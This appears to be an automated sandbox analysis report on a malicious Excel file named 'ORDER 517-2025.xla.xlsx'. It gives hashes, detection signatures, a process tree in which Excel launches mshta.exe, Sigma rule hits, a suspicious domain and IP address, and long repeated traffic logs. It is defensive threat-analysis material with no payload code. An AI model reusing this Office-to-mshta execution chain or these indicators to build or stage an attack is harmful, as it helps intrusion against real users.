Edit tour

Windows Analysis Report
ORDER 517-2025.xla.xlsx

Overview

General Information

Sample name:ORDER 517-2025.xla.xlsx
Analysis ID:1648793
MD5:f9137fe9005de451da58b57301dba5b9
SHA1:5d756a8364f3382703825b71c89247bb2d156f11
SHA256:32df4f4afa4d06c6096d807535d584556cb7dca6234088299106a93a49a8e4ef
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • EXCEL.EXE (PID: 7144 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 2104 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 6028 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 1884 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7144, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 2104, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 147.79.86.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7144, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7144, Protocol: tcp, SourceIp: 147.79.86.93, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-26T08:25:23.557019+010020283713Unknown Traffic192.168.2.74970013.107.246.40443TCP
2025-03-26T08:25:30.070483+010020283713Unknown Traffic192.168.2.74970113.107.246.40443TCP
2025-03-26T08:25:30.075670+010020283713Unknown Traffic192.168.2.74970213.107.246.40443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ORDER 517-2025.xla.xlsxReversingLabs: Detection: 25%
Source: ORDER 517-2025.xla.xlsxVirustotal: Detection: 28%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.7:49700 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: agr.my
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 209.46.124.102:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
